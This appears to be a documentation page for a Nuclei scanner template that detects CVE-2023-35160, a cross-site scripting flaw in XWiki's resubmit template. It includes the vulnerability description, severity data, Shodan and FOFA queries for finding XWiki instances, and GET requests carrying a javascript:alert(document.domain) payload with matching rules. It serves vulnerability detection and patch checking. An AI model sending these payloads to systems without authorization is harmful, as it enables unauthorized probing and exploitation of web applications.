XWiki >= 2.5-milestone-2 - Cross-Site Scripting
ID: CVE-2023-35160
Severity: medium
Author: ritikchaddha
Tags: cve,cve2023,xwiki,xss
Description
Section titled “Description”XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It’s possible to exploit the resubmit template to perform a XSS, e.g. by using URL such as: > xwiki/bin/view/XWiki/Main xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain). This vulnerability exists since XWiki 2.5-milestone-2. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.
YAML Source
Section titled “YAML Source”id: CVE-2023-35160
info: name: XWiki >= 2.5-milestone-2 - Cross-Site Scripting author: ritikchaddha severity: medium description: | XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the resubmit template to perform a XSS, e.g. by using URL such as: > xwiki/bin/view/XWiki/Main xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain). This vulnerability exists since XWiki 2.5-milestone-2. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1. impact: | Successful exploitation could lead to cross-site scripting. remediation: | This vulnerability has been patched in XWiki 14.10.5,15.1-rc-1. reference: - https://jira.xwiki.org/browse/XWIKI-20343 - https://nvd.nist.gov/vuln/detail/CVE-2023-35160 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-35160 cwe-id: CWE-79 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: max-request: 2 verified: true vendor: xwiki product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" tags: cve,cve2023,xwiki,xss
http: - method: GET path: - "{{BaseURL}}/xwiki/bin/view/XWiki/Main?xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain)" - "{{BaseURL}}/bin/view/XWiki/Main?xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain)"
stop-at-first-match: true
matchers-condition: and matchers: - type: word part: body words: - 'action="javascript:alert(document.domain)"' - 'XWikiGuest' condition: and
- type: word part: header words: - 'text/html'
- type: status status: - 200 - 401# digest: 4b0a004830460221008904a62315c499dc09b58aea95db32108284ae969f61cd0d1604de0543f12d3c022100b72eda79032d6404177609b676397c6c6c6d6009290a94d1c3a4b455743caad1:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-35160.yaml"